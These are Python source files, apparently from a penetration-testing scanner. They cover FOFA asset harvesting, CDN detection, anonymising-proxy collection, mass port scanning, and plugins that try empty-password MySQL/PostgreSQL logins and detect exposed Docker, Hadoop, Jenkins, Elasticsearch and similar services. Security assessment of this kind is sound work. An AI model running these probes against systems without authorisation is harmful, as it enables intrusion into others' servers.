url = "https://fofa.so/api/v1/search/all?email={0}&key={1}&qbase64={2}&full=true&fields=ip,title,port,domain,protocol,host,country,header&size={3}".format(
self.email, self.key, keywordsBs, fofaSize)
self.urls.append(url)
# 回调函数, 刷新进度条
def callback(self, future, progress_bar, count):
self.process.advance(progress_bar, advance=count)
async def fetch_all(self, loop):
# loop = asyncio.get_event_loop()
# asyncio.set_event_loop(loop)
tasks = []
# 写完才发现 aiohttp 不支持https代理, 改用 loop.run_in_executor()函数 执行阻塞的requests库
# async with aiohttp.ClientSession(connector=aiohttp.TCPConnector(ssl=False), headers=headers) as session:
threads = ThreadPoolExecutor(10)
for url in self.urls:
# task = asyncio.ensure_future(self.fetch(session, url, sem))
task = loop.run_in_executor(threads, self.fetch, url)
task.add_done_callback(partial(self.callback, progress_bar=self.fofa_progress_bar, count=self.count))
tasks.append(task)
if platform.system() != "Windows":
import uvloop
asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
await asyncio.wait(tasks)
def fetch(self, url):
try:
self.session.headers = self.headers
# self.session.proxies = {
# "https": "http://127.0.0.1:8080"
# }
response = self.session.get(url, timeout=10)
if response.status_code == 200:
datas = json.loads(response.text)
# 查询结果没有出错时
if not datas['error']:
self.target_info(datas['results'])
else:
logger.log("ERROR", f'fofa 查询失败,{response.status_code }')
except Exception as e:
logger.log("ERROR", e)
pass
def target_info(self, datas):
for data in datas:
# ip,title,port,domain,protocol,host,country,header
# ['127.0.0.1', 'Welcome to CentOS', '443', '', '', '127.0.0.1:443', 'CN', 'HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 4833\r\nAccept-Ranges: bytes\r\nContent-Type: text/html\r\nDate: Sun, 22 Nov 2020 10:40:22 GMT\r\nEtag: "53762af0-12e1"\r\nLast-Modified: Fri, 16 May 2014 15:12:48 GMT\r\nServer: nginx/1.16.1']
# 只要限定国家的信息, 默认为CN
if data[6] == fofaCountry:
# if data[4] == "http" or data[4] == "https" or "http" in data[5]:
if 'HTTP/1.' in data[7]:
if "http://" in data[5] or "https://" in data[5]:
url = data[5]
elif not data[4]:
url = "http://{1}".format(data[4], data[5])
else:
url = "{0}://{1}".format(data[4], data[5])
self.result_urls.append(url)
    async def crawler(self, url, semaphore):
        """Probe one URL asynchronously and record it when it looks alive.

        Concurrency is bounded by *semaphore*.  TLS verification is disabled
        (scan targets often use self-signed certificates).  A URL counts as
        alive when it answers 200/403/404; all network errors are deliberately
        swallowed so dead hosts are simply dropped.
        """
        async with semaphore:
            try:
                async with aiohttp.ClientSession(connector=aiohttp.TCPConnector(ssl=False),
                                                 headers=self.headers) as session:
                    async with session.get(url, timeout=6) as resp:
                        if url in self.urls_list or url in fofa_list:  # already recorded — skip duplicates
                            return
                        fofa_list.append(url)
                        text = await resp.text()
                        # Grab the HTML <title>, empty string when absent.
                        m = re.search('<title>(.*?)</title>', text)
                        title = m.group(1) if m else ''
                        status = resp.status
                        if status == 200 or status == 404 or status == 403:
                            self.urls_list.append(url)
                            self.life_urls.append((url, title))
                            self.fofa_result.put((url, title))
            except Exception:
                pass
    # Verify which of the collected web services are actually alive.
    def is_life(self):
        """Concurrently probe every URL in self.result_urls and keep live ones.

        Spins up a fresh event loop running up to 2000 crawler() coroutines;
        each finished task advances the progress bar via callback().
        """
        if len(self.result_urls) == 0:
            return
        self.fofa_progress_bar = self.process.add_task("[cyan]FOFA Web results verify valid...",
                                                       total=len(self.result_urls))
        loop = asyncio.new_event_loop()
        asyncio.set_event_loop(loop)
        sem = asyncio.Semaphore(2000)  # cap the number of in-flight requests
        tasks = []
        for url in self.result_urls:
            task = loop.create_task(self.crawler(url, sem))
            task.add_done_callback(partial(self.callback, progress_bar=self.fofa_progress_bar, count=1))
            tasks.append(task)
        loop.run_until_complete(asyncio.wait(tasks))
--- FILE SEPARATOR ---
'''
判断cdn
参考oneforall
https://github.com/shmilylty/OneForAll/blob/master/modules/iscdn.py
'''
import socket
from lib.config import setting
from lib.config.log import logger
import requests
requests.packages.urllib3.disable_warnings()
import re
import asyncio
import ipaddress
import geoip2.database
# 忽略https证书验证
import ssl
if hasattr(ssl, '_create_unverified_context'):
ssl._create_default_https_context = ssl._create_unverified_context
import dns.resolver
from urllib.parse import urlparse
from concurrent.futures import ThreadPoolExecutor
from lib.common.utils import load_json, get_host, intranet_ip
data_dir = setting.data_storage_dir
# CDN fingerprint data sets, loaded once at import time.
# IP CIDR ranges and ASN list from https://github.com/al0ne/Vxscan/blob/master/lib/iscdn.py
cdn_ip_cidr = load_json(data_dir.joinpath('cdn_ip_cidr.json'))
cdn_asn_list = load_json(data_dir.joinpath('cdn_asn_list.json'))
# CNAME keywords and response-header keys from https://github.com/Qclover/CDNCheck/blob/master/checkCDN/cdn3_check.py
cdn_cname_keyword = load_json(data_dir.joinpath('cdn_cname_keywords.json'))
cdn_header_key = load_json(data_dir.joinpath('cdn_header_keys.json'))
def get_cname(cnames, cname):
    """Follow the CNAME chain one hop at a time, appending each alias to *cnames*.

    Recursion stops silently on the first resolution failure, i.e. when the
    end of the chain is reached or the lookup errors out.
    """
    try:
        answer = dns.resolver.resolve(cname, 'CNAME', lifetime=10)
        next_alias = [record.to_text() for record in answer][0]
        cnames.append(next_alias)
        get_cname(cnames, next_alias)
    except Exception:
        pass
def get_cnames(cnames, url):  # collect the full CNAME chain for a URL's host
    """Resolve *url*'s host and return its CNAME chain as a string.

    NOTE(review): on resolution failure only the *local* name ``cnames`` is
    rebound to None, so the function returns the string 'None' — which is
    truthy — instead of an empty result; confirm callers expect that.
    """
    # Extract the network location; urlparse needs a scheme to split reliably.
    if url.find('://') < 0:
        netloc = url[:url.find('/')] if url.find('/') > 0 else url
    else:
        scheme, netloc, path, params, query, fragment = urlparse(url, 'http')
    try:
        resolver = dns.resolver.Resolver()
        resolver.timeout = 1
        resolver.lifetime = 1
        answer = resolver.resolve(netloc,'CNAME')
    except Exception:
        cnames = None
    else:
        cname = [_.to_text() for _ in answer][0]
        cnames.append(cname)
        # Keep following the chain recursively.
        get_cname(cnames, cname)
    return str(cnames)
# Fetch response headers.  The URL must start with http:// or https://, so a
# missing scheme is patched with http:// first.
def get_headers(url):
    """Return str(response.headers).lower() for *url*, or None on any failure."""
    if not url.startswith(("http://", "https://")):
        url = "http://" + url
    try:
        response = requests.get(url, headers=setting.default_headers, timeout=3, verify=False)
        return str(response.headers).lower()
    except Exception:
        return None
def get_ip_list(url):
    """Resolve *url*'s host to an IPv4 address string, or 'Invalid' on failure.

    NOTE(review): the intranet check below is ineffective — both branches
    return the same ip, so private addresses come back like any other.
    Confirm whether intranet IPs were meant to be filtered out.
    """
    host, scheme = get_host(url)
    try:
        ip = socket.gethostbyname(host)
        # Check whether the resolved ip is an intranet ip (currently a no-op).
        if not intranet_ip(ip):
            return ip
        return ip
    except Exception:
        logger.log('ERROR', f'Invalid domain: {url}')
        return 'Invalid'
def check_cdn_cidr(ip):
    """Return True when *ip* falls inside a known CDN CIDR range, else False.

    Unparseable addresses are logged at DEBUG level and treated as non-CDN.
    """
    try:
        ip = ipaddress.ip_address(ip)
    except Exception as e:
        logger.log('DEBUG', f'{e}')
        return False
    # Fixed: the original fell off the loop and implicitly returned None;
    # callers only test truthiness, so returning False is backward-compatible.
    return any(ip in ipaddress.ip_network(cidr) for cidr in cdn_ip_cidr)
def check_cname_keyword(cname):
    """Return True when any known CDN CNAME keyword occurs in a name of *cname*."""
    for alias in cname:
        lowered = alias.lower()
        for keyword in cdn_cname_keyword.keys():
            if keyword in lowered:
                return True
def check_header_key(headers):
    """Return True when any known CDN response-header key occurs in *headers*."""
    for header_key in cdn_header_key:
        if header_key in headers:
            return True
def check_cdn_asn(ip):
    """Return True when *ip*'s ASN belongs to a known CDN operator.

    Returns False on any lookup error; implicitly None when the ASN is not in
    the CDN list (callers only test truthiness).
    """
    try:
        # Database download: https://www.maxmind.com/en/accounts/410249/geoip/downloads
        db_path = setting.data_storage_dir.joinpath('GeoLite2-ASN.mmdb')
        with geoip2.database.Reader(db_path) as reader:
            asn_number = reader.asn(ip).autonomous_system_number
            if str(asn_number) in cdn_asn_list:
                return True
    except Exception:
        return False
def run(target, checkcdn, progress_bar, progress):
    """Resolve one target and optionally detect whether it sits behind a CDN.

    Returns (targets, valid_target):
      - unresolvable domain      -> ([], '')
      - bare-IP target (checkcdn)-> ([target], target)
      - CDN detected             -> ([target], target)          scan URL only
      - no CDN / check disabled  -> ([target, ip], target)      scan URL and ip
    """
    flag = False
    targets = []
    ip = get_ip_list(target)
    # Invalid domains are dropped from the target list entirely.
    if ip == 'Invalid':
        progress.advance(progress_bar)
        return [], ''
    targets.append(target)
    # Optional CDN detection.
    if checkcdn:
        # Only domains are CDN-checked; targets containing an IPv4 literal
        # are returned as-is (note: this branch skips the progress update).
        if re.match(r".*(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?).*", target):
            return [target], target
        data = [{'cname': get_cnames([], target), 'headers': get_headers(target), 'ip': ip}]
        for index, item in enumerate(data):
            cname = item.get('cname')
            if cname:
                # NOTE(review): get_cnames() returns a *string* ('None' on
                # failure), so this iterates characters — confirm intent.
                if check_cname_keyword(cname):
                    flag = True
                    break
            try:
                headers = item.get('headers')
                if headers:
                    # NOTE(review): eval() of the stringified headers dict;
                    # ast.literal_eval would be safer for data like this.
                    headers = eval(headers).keys()
                    if check_header_key(headers):
                        flag = True
                        break
            except Exception as e:
                logger.log('DEBUG', f'{e}')
                pass
            ip_tmp = item.get('ip')
            if check_cdn_cidr(ip_tmp) or check_cdn_asn(ip_tmp):
                flag = True
                break
    progress.advance(progress_bar)
    # Behind a CDN: scan only the URL; otherwise scan the URL and its ip.
    if flag:
        return targets, target
    else:
        targets.append(ip)
        return targets, target
# Resolving and CDN-checking ~5000 domains takes a little over 3 minutes.
def check_cdn(original_targets, checkcdn):
    """Resolve all targets concurrently and return (targets, valid_targets).

    targets: deduplicated urls plus the resolved ips of non-CDN hosts.
    valid_targets: the input targets that resolved successfully.
    """
    targets = []        # valid targets plus their resolved ips
    valid_targets = []  # valid targets only
    # Create a dedicated event loop.
    loop = asyncio.new_event_loop()
    asyncio.set_event_loop(loop)
    # Thread pool with 100 workers for the blocking run() calls.
    threads = ThreadPoolExecutor(100)
    # Key point: run the blocking run() on the pool via
    # loop.run_in_executor(pool, fn, *args).
    tasks = []
    # Progress-bar setup.
    from rich.progress import (
        BarColumn,
        TimeRemainingColumn,
        TransferSpeedColumn,
        Progress,
    )
    progress = Progress(
        "[progress.description]{task.description}",
        BarColumn(),
        "[progress.percentage]{task.percentage:>3.1f}%",
        "•",
        "[bold green]{task.completed}/{task.total}",
        "•",
        TransferSpeedColumn(),
        "•",
        TimeRemainingColumn(),
        transient=True,  # hide the bar once it reaches 100%
    )
    with progress:
        progress_bar = progress.add_task("[cyan]DNS, CDN detection...", total=len(original_targets))
        for target in original_targets:
            target = target.replace('\n', '').replace('\r', '').strip()
            tasks.append(loop.run_in_executor(threads, run, target, checkcdn, progress_bar, progress))
        if len(tasks) > 0:
            # uvloop accelerates asyncio but does not support Windows.
            import platform
            if platform.system() != "Windows":
                import uvloop
                asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
            # Wait for every resolution task to finish.
            tasks_result = asyncio.wait(tasks)
            loop.run_until_complete(tasks_result)
            for i in tasks:
                url_ip_list, valid_domain = i.result()
                targets.extend(url_ip_list)
                if valid_domain:
                    valid_targets.append(valid_domain)
    return list(set(targets)), valid_targets
--- FILE SEPARATOR ---
# -*- coding:utf-8 -*-
# !/usr/bin/python3
# @Time : 2021/2/3 17:16
# @Author : yhy
# 参考 https://github.com/s7ckTeam/Glass/blob/main/lib/proxy.py
import os
import ssl
import time
import json
import random
import urllib3
import requests
import threading
from lib.config.setting import USER_AGENTS, threadNum, relative_directory, proxyList, country
from lib.config.log import logger
ssl._create_default_https_context = ssl._create_unverified_context
urllib3.disable_warnings()
lock = threading.Lock()
# Validate that a proxy is a usable, non-transparent ("high quality") proxy.
class ProxyInfo(threading.Thread):
    """Thread that checks one proxy by fetching https://httpbin.org/ip through it.

    A proxy is accepted (appended to the shared proxyList) only when the
    echoed origin IP equals the proxy host and contains no comma — a comma
    means the real client IP leaked through (transparent proxy).
    """
    def __init__(self, types, host, port, sem):
        super(ProxyInfo, self).__init__()
        self.types = types  # proxy scheme, e.g. "http" / "https"
        self.host = host
        self.port = port
        self.sem = sem      # bounds the number of concurrent checker threads
        self.headers = {
            "User-Agent": random.choice(USER_AGENTS),
        }

    def run(self):
        s = requests.Session()
        s.keep_alive = False  # do not keep idle connections around
        s.headers = self.headers
        proxy = f"{self.types}://{self.host}:{self.port}"
        s.proxies = {
            self.types: proxy
        }
        try:
            req = s.get("https://httpbin.org/ip", timeout=5)
            # Fixed: take the lock via a context manager so it is always
            # released even if an exception fires while it is held (the
            # original could leave the lock locked forever).
            with lock:
                codes = req.text
                if ',' in codes:
                    pass  # transparent proxy: both proxy and client IP echoed
                elif self.host in codes:
                    proxyList.append({self.types: proxy})
                req.close()
        except (requests.exceptions.ConnectTimeout, requests.exceptions.ReadTimeout, requests.exceptions.Timeout,
                requests.exceptions.SSLError, requests.exceptions.ConnectionError, ssl.SSLError, AttributeError,
                ConnectionRefusedError, urllib3.exceptions.ReadTimeoutError, urllib3.exceptions.ProtocolError,):
            pass
        except KeyboardInterrupt:
            pass
        finally:
            # Fixed: release the semaphore unconditionally so a crashed check
            # cannot deadlock getProxy()'s sem.acquire() loop.
            self.sem.release()
def getPage():
    """Download the public proxy list and return [[type, host, port], ...].

    Tries the GitHub raw file first, falling back to the mirror site, and
    exits the program when neither source is reachable.  When the configured
    country is "cn", only proxies located in CN are kept.
    """
    s = requests.Session()
    s.headers = {
        "User-Agent": random.choice(USER_AGENTS),
    }
    s.keep_alive = False
    proxyGit = "https://raw.githubusercontent.com/fate0/proxylist/master/proxy.list"
    proxyPage = "http://proxylist.fatezero.org/proxy.list"
    datasGit = []
    datasPage = []
    try:
        datasGit = s.get(proxyGit).text.split('\n')
    except requests.exceptions.ConnectionError:
        try:
            datasPage = s.get(proxyPage).text.split('\n')
        except requests.exceptions.ConnectionError as e:
            logger.log('ERROR', f'网络超时,代理获取失败,请重新获取 {e}')
            exit(0)
    proxyDatas = []
    # One JSON object per line; blank lines are skipped.
    for proxy_str in datasGit + datasPage:
        if not proxy_str:
            continue
        proxy_json = json.loads(proxy_str)
        # Fixed: the CN and non-CN branches duplicated identical extraction
        # code — filter first, then extract once.
        if country == "cn" and proxy_json['country'] != "CN":
            continue
        proxyDatas.append([proxy_json['type'], proxy_json['host'], proxy_json['port']])
    return proxyDatas
def getProxy(files):
    """Fetch candidate proxies, validate them concurrently, and append the
    surviving high-quality proxies (one dict repr per line) to *files*."""
    logger.log('INFOR', f'正在获取代理IP')
    proxyDatas = getPage()
    logger.log('INFOR', f'总共获取{len(proxyDatas)}条代理IP')
    logger.log('INFOR', f'正在验证高质量代理IP')
    threads = []
    sem = threading.Semaphore(threadNum)  # caps concurrent checker threads
    try:
        for types, host, port in proxyDatas:
            sem.acquire()  # released by each ProxyInfo thread when done
            t = ProxyInfo(types, host, port, sem)
            # Fixed: Thread.setDaemon() is deprecated; assign .daemon instead.
            t.daemon = True
            threads.append(t)
            t.start()
        for t in threads:
            t.join()
    except KeyboardInterrupt:
        pass
    if proxyList:
        logger.log('INFOR', f'获取{len(proxyList)}条高质量IP')
        # Fixed: open the output file once instead of re-opening per proxy.
        with open(files, 'a', encoding="utf-8") as f:
            for p in proxyList:
                f.write(str(p))
                f.write('\n')
    else:
        logger.log('ERROR', f'在线获取失败')
def checkProxyFile():
    """Load cached proxies from proxy.txt, refreshing the cache when it is
    older than 15 minutes (or missing)."""
    import ast  # local import: only needed to parse the cached proxy dicts

    files = os.path.join(relative_directory, 'proxy.txt')
    if os.path.isfile(files):
        file_mtime = os.stat(files).st_mtime  # cache last-modified time
        # Fixed: the original compared YYYYmmddHHMM strings as integers,
        # which miscounts minutes across hour/day boundaries; compare
        # epoch seconds instead.
        age_minutes = (time.time() - file_mtime) / 60
        # Re-fetch proxies when the cache is older than 15 minutes.
        if age_minutes >= 15:
            os.remove(files)
            getProxy(files)
        else:
            try:
                with open(files, 'r', encoding="utf-8") as f:
                    for pro in f.readlines():
                        p = pro.strip()
                        # Fixed: literal_eval instead of eval — each cached
                        # line is data, not code, and must not be executed.
                        _proxy = ast.literal_eval(p)
                        proxyList.append(_proxy)
                logger.log('INFOR', f'共获取 {len(proxyList)} 条高质量代理IP')
            except FileNotFoundError as e:
                logger.log('DEBUG', f'{str(e)}')
                pass
    else:
        getProxy(files)
--- FILE SEPARATOR ---
#!/usr/bin/python3
# -*- coding:utf-8 -*-
# @Author : yhy
# mysql空口令
import pymysql
from lib.common.utils import save_script_result
ports_to_check = 3306  # default port probed for this script

def do_check(self, url):
    """Check whether the target's MySQL server accepts root with an empty password."""
    if url != '/':
        return  # run once per target, on the root path only
    port = 3306
    if self.scheme == 'mysql' and self.port != 3306:  # detected non-standard port
        port = self.port
    elif 3306 not in self.ports_open:
        return
    try:
        # Fixed: pass the detected port — the original always dialed 3306
        # even when a non-standard MySQL port had been identified.
        conn = pymysql.connect(host=self.host, port=int(port), user='root', password='',
                               charset='utf8', autocommit=True)
        conn.close()
        save_script_result(self, '', 'mysql://%s:%s' % (self.host, port), '', 'Mysql empty password')
    except Exception:
        pass
--- FILE SEPARATOR ---
# -*- coding:utf-8 -*-
# !/usr/bin/python3
# @Time : 2021/2/25 10:44
# @Author : yhy
import asyncio
import random
import platform
from lib.common.utils import get_host
# 进度条设置
from rich.progress import (
BarColumn,
TimeRemainingColumn,
TransferSpeedColumn,
Progress,
)
# Coroutine-based TCP port scanner.
class PortScan(object):
    """Asynchronously scan `targets` for open TCP ports from `port_list`.

    Results accumulate in self.open_list as {host: [open_port, ...]}.
    """
    def __init__(self, targets, port_list, rate=2000, timeout=3):
        super(PortScan, self).__init__()
        self.targets = targets
        self.hosts = []
        self.rate = rate            # max concurrent connection attempts
        self.timeout = timeout      # per-connection timeout (seconds)
        self.open_list = {}         # host -> list of open ports
        self.port_list = port_list  # ports to probe on every host
        self.process = Progress(
            "[progress.description]{task.description}",
            BarColumn(),
            "[progress.percentage]{task.percentage:>3.1f}%",
            "•",
            "[bold green]{task.completed}/{task.total}",
            "•",
            TransferSpeedColumn(),
            "•",
            TimeRemainingColumn(),
            transient=True,  # hide the bar once it reaches 100%
        )
        self.progress_bar = self.process.add_task("[cyan]port scan...", total=len(self.targets) * len(self.port_list))

    async def async_port_check(self, semaphore, host_port):
        """Attempt one TCP connect; return (host, port, 'open'|'close')."""
        async with semaphore:
            host, port = host_port
            writer = None
            try:
                conn = asyncio.open_connection(host, port)
                reader, writer = await asyncio.wait_for(conn, timeout=self.timeout)
                return host, port, 'open'
            except Exception:
                return host, port, 'close'
            finally:
                # Fixed: close the stream writer, not the coroutine object —
                # the original conn.close() never closed the TCP socket.
                if writer is not None:
                    writer.close()

    # Done-callback: advance the progress bar and record open ports.
    def callback(self, future):
        host, port, status = future.result()
        self.process.advance(self.progress_bar, advance=1)
        if status == "open":
            try:
                if host in self.open_list:
                    self.open_list[host].append(port)
                else:
                    self.open_list[host] = [port]
            except Exception as e:
                print(e)
        else:
            pass

    def async_tcp_port_scan(self):
        """Run the scan and return the {host: [open ports]} mapping."""
        # Scheme-prefixed URLs (e.g. https://127.0.0.1) are not supported
        # directly, so normalise every target to a bare host first.
        for url in self.targets:
            host, scheme = get_host(url)
            self.hosts.append(host)
        host_port_list = [(host, int(port)) for host in self.hosts for port in self.port_list]
        # Fixed: removed a stray debug print of the full host/port list.
        sem = asyncio.Semaphore(self.rate)  # bound concurrency
        loop = asyncio.get_event_loop()
        # Shuffle so probes are spread across hosts instead of hammering one.
        random.shuffle(host_port_list)
        tasks = list()
        with self.process:
            for host_port in host_port_list:
                task = asyncio.ensure_future(self.async_port_check(sem, host_port))
                task.add_done_callback(self.callback)
                tasks.append(task)
            if platform.system() != "Windows":
                # uvloop accelerates asyncio but does not support Windows.
                import uvloop
                asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
            loop.run_until_complete(asyncio.wait(tasks))
        return self.open_list
if __name__ == '__main__':
    # Quick manual smoke test.  Targets must be bare hosts — scheme-prefixed
    # URLs such as https://127.0.0.1 are not supported.
    hosts = ['127.0.0.1', '127.0.0.1']
    ports = [80,443,3389,22,21,3750]
    import time
    now = time.time
    start = now()
    ps = PortScan(hosts, ports, 2000)
    # Example output: {'127.0.0.1': [80, 22]} — duplicate hosts collapse into one key.
    print(ps.async_tcp_port_scan())
    print("Time:",now() - start)
--- FILE SEPARATOR ---
#!/usr/bin/python3
# -*- coding:utf-8 -*-
# @Author : yhy
# CouchDB 未授权访问
import requests
from lib.common.utils import save_script_result
from lib.config.setting import default_headers
ports_to_check = 5984  # default port probed for this script

def do_check(self, url):
    """Report CouchDB instances whose /_utils/ console is reachable without auth."""
    if url != '/':
        return
    # A detected non-standard CouchDB port wins; otherwise 5984 must be open.
    port = 5984
    if self.scheme == 'CouchDB' and self.port != 5984:
        port = self.port
    elif 5984 not in self.ports_open:
        return
    try:
        target = 'http://' + self.host + ':' + str(port) + '/_utils/'
        resp = requests.get(target, timeout=5, verify=False, headers=default_headers)
        if 'couchdb-logo' in resp.content.decode():
            save_script_result(self, '', 'http://%s:%s/_utils/' % (self.host, port), 'CouchDB Unauthorized Accesss')
    except Exception:
        pass
--- FILE SEPARATOR ---
#!/usr/bin/python3
# -*- coding:utf-8 -*-
# @Author : yhy
# Hadoop 未授权访问
import requests
from lib.common.utils import save_script_result
from lib.config.setting import default_headers
ports_to_check = 50070  # default port probed for this script

def do_check(self, url):
    """Report Hadoop NameNode web UIs reachable without authentication."""
    if url != '/':
        return
    port = 50070
    if self.scheme == 'Hadoop' and self.port != 50070:  # detected non-standard port
        port = self.port
    elif 50070 not in self.ports_open:
        return
    try:
        target = 'http://' + self.host + ':' + str(port) + '/dfshealth.html'
        resp = requests.get(target, timeout=5, verify=False, headers=default_headers)
        if 'hadoop.css' in resp.content.decode():
            save_script_result(self, '', 'http://%s:%s/dfshealth.html' % (self.host, port), 'Hadoop Unauthorized Accesss')
    except Exception:
        pass
--- FILE SEPARATOR ---
#!/usr/bin/python3
# -*- coding:utf-8 -*-
# @Author : yhy
# Hadoop yarn 未授权访问
import requests
from lib.common.utils import save_script_result
from lib.config.setting import default_headers
ports_to_check = 8088  # default port probed for this script

def do_check(self, url):
    """Report Hadoop YARN ResourceManager REST APIs open to the world."""
    if url != '/':
        return
    port = 8088
    if self.scheme == 'Hadoop yarn' and self.port != 8088:  # detected non-standard port
        port = self.port
    elif 8088 not in self.ports_open:
        return
    try:
        target = 'http://' + self.host + ':' + str(port) + '/ws/v1/cluster/info'
        resp = requests.get(target, timeout=5, verify=False, headers=default_headers)
        body = resp.content.decode()
        if 'resourceManagerVersionBuiltOn' in body or 'hadoopVersion' in body:
            save_script_result(self, '', 'http://%s:%s/ws/v1/cluster/info' % (self.host, port), 'Hadoop yarn Unauthorized Accesss')
    except Exception:
        pass
--- FILE SEPARATOR ---
#!/usr/bin/python3
# -*- coding:utf-8 -*-
# @Author : yhy
# docker api 未授权访问
import requests
from lib.common.utils import save_script_result
from lib.config.setting import default_headers
ports_to_check = 2375  # default port probed for this script

def do_check(self, url):
    """Report Docker daemons exposing the remote API without authentication."""
    if url != '/':
        return
    port = 2375
    if self.scheme == 'docker api' and self.port != 2375:  # detected non-standard port
        port = self.port
    elif 2375 not in self.ports_open:
        return
    try:
        target = 'http://' + self.host + ':' + str(port) + '/version'
        resp = requests.get(target, timeout=5, verify=False, headers=default_headers)
        if 'ApiVersion' in resp.content.decode():
            save_script_result(self, '', 'http://%s:%s/version' % (self.host, port), 'docker api Unauthorized Accesss')
    except Exception:
        pass
--- FILE SEPARATOR ---
#!/usr/bin/python3
# -*- coding:utf-8 -*-
# @Author : yhy
# docker registry api 未授权访问
import requests
from lib.common.utils import save_script_result
ports_to_check = 30000  # default port probed for this script

def do_check(self, url):
    """Report Docker registries whose catalog API (v2, then legacy v1) is open."""
    if url != '/':
        return
    port = 30000
    if self.scheme == 'docker api' and self.port != 30000:  # detected non-standard port
        port = self.port
    elif 30000 not in self.ports_open:
        return
    try:
        # Probe the v2 catalog first.
        resp_v2 = requests.get(f"http://{self.host}:{port}/v2/_catalog", timeout=5, verify=False)
        if "repositories" in resp_v2.text:
            save_script_result(self, '', 'http://%s:%s/v2/_catalog' % (self.host, port), 'docker registry api Unauthorized Accesss')
            return
        # Fall back to the legacy v1 catalog path.
        resp_v1 = requests.get(f"http://{self.host}:{port}/v1/_catalog", timeout=5, verify=False)
        if "repositories" in resp_v1.text:
            save_script_result(self, '', 'http://%s:%s/v1/_catalog' % (self.host, port), 'docker registry api Unauthorized Accesss')
            return
    except Exception:
        pass
--- FILE SEPARATOR ---
#!/usr/bin/python3
# -*- coding:utf-8 -*-
# @Author : yhy
# elasticsearch 未授权访问
import requests
from lib.common.utils import save_script_result
ports_to_check = 9200  # default port probed for this script

def do_check(self, url):
    """Report Elasticsearch instances whose /_cat API answers without auth."""
    if url != '/':
        return
    port = 9200
    if self.scheme == 'elasticsearch' and self.port != 9200:  # detected non-standard port
        port = self.port
    elif 9200 not in self.ports_open:
        return
    try:
        target = 'http://' + self.host + ':' + str(port) + '/_cat'
        resp = requests.get(target, timeout=5)
        if '/_cat/master' in resp.content.decode():
            save_script_result(self, '', 'http://%s:%s/_cat' % (self.host, port), 'Elasticsearch Unauthorized Accesss')
    except Exception:
        pass
--- FILE SEPARATOR ---
#!/usr/bin/python3
# -*- coding:utf-8 -*-
# @Author : yhy
# FTP 未授权访问
import ftplib
from lib.common.utils import save_script_result
ports_to_check = 21  # default port probed for this script

def do_check(self, url):
    """Report FTP servers that accept anonymous logins."""
    if url != '/':
        return
    port = 21
    if self.scheme == 'ftp' and self.port != 21:  # detected non-standard port
        port = self.port
    elif 21 not in self.ports_open:
        return
    ftp = ftplib.FTP()
    try:
        ftp.connect(self.host, port, timeout=5)  # connect to the FTP server
        ftp.login('anonymous', 'Aa@12345678')
        save_script_result(self, '', 'ftp://%s:%s/' % (self.host, port), 'FTP Unauthorized Accesss')
    except Exception:
        pass
    finally:
        # Fixed: the original leaked the control connection on success.
        ftp.close()
--- FILE SEPARATOR ---
#!/usr/bin/python3
# -*- coding:utf-8 -*-
# @Author : yhy
# JBoss 未授权访问
import requests
from lib.common.utils import save_script_result
ports_to_check = 8080  # default port probed for this script

def do_check(self, url):
    """Report JBoss servers whose JMX console is reachable without authentication."""
    if url != '/':
        return
    port = 8080
    # Fixed: the original tested self.scheme == 'jenkins' (copy-paste from
    # the jenkins script), so a non-standard JBoss port was never honoured.
    if self.scheme == 'jboss' and self.port != 8080:
        port = self.port
    elif 8080 not in self.ports_open:
        return
    try:
        url = 'http://' + self.host + ':' + str(port) + '/jmx-console/HtmlAdaptor?action=displayMBeans'
        r = requests.get(url, timeout=5)
        body = r.content.decode()
        if 'JBoss JMX Management Console' in body and r.status_code == 200 and 'jboss' in body:
            save_script_result(self, '', 'http://%s:%s/jmx-console/HtmlAdaptor?action=displayMBeans' % (self.host, port), 'JBoss Unauthorized Accesss')
    except Exception:
        pass
--- FILE SEPARATOR ---
#!/usr/bin/python3
# -*- coding:utf-8 -*-
# @Author : yhy
# jenkins 未授权访问
import requests
from lib.common.utils import save_script_result
ports_to_check = 8080  # default port probed for this script

def do_check(self, url):
    """Report Jenkins instances whose /systemInfo page is readable without auth."""
    if url != '/':
        return
    port = 8080
    if self.scheme == 'jenkins' and self.port != 8080:  # detected non-standard port
        port = self.port
    elif 8080 not in self.ports_open:
        return
    try:
        target = 'http://' + self.host + ':' + str(port) + '/systemInfo'
        resp = requests.get(target, timeout=5)
        body = resp.content.decode()
        if 'jenkins.war' in body and 'JENKINS_HOME' in body:
            save_script_result(self, '', 'http://%s:%s/systemInfo' % (self.host, port), 'jenkins Unauthorized Accesss')
    except Exception:
        pass
--- FILE SEPARATOR ---
#!/usr/bin/python3
# -*- coding:utf-8 -*-
# @Author : yhy
# memcached 未授权访问
import socket
from lib.common.utils import save_script_result
ports_to_check = 11211  # default port probed for this script

def do_check(self, url):
    """Report memcached instances answering the 'stats' command without auth."""
    if url != '/':
        return
    port = 11211
    if self.scheme == 'memcached' and self.port != 11211:  # detected non-standard port
        port = self.port
    elif 11211 not in self.ports_open:
        return
    # Fixed: create the socket before the try block — the original's finally
    # clause referenced `s` and raised NameError if socket creation failed.
    socket.setdefaulttimeout(5)
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        s.connect((self.host, port))
        s.send(bytes('stats\r\n', 'UTF-8'))
        if 'version' in s.recv(1024).decode():
            save_script_result(self, '', 'memcached://%s:%s' % (self.host, port), 'Memcached Unauthorized Accesss')
    except Exception:
        pass
    finally:
        # Single close here replaces the original's redundant double close.
        s.close()
--- FILE SEPARATOR ---
#!/usr/bin/python
# -*- encoding: utf-8 -*-
# PostgreSQL 空口令访问
import psycopg2
from lib.common.utils import save_script_result
ports_to_check = 5432  # default port probed for this script

def do_check(self, url):
    """Report PostgreSQL servers that accept the postgres user with an empty password."""
    if url != '/':
        return
    port = 5432
    if self.scheme == 'PostgreSQL' and self.port != 5432:  # detected non-standard port
        port = self.port
    elif 5432 not in self.ports_open:
        return
    try:
        conn = psycopg2.connect(database="postgres", user="postgres", password="", host=self.host, port=port)
        # Fixed: close the connection (it leaked) and report the correct
        # scheme — the original said mysql://, a copy-paste error.
        conn.close()
        save_script_result(self, '', 'postgres://%s:%s' % (self.host, port), '', 'PostgreSQL empty password')
    except Exception:
        pass
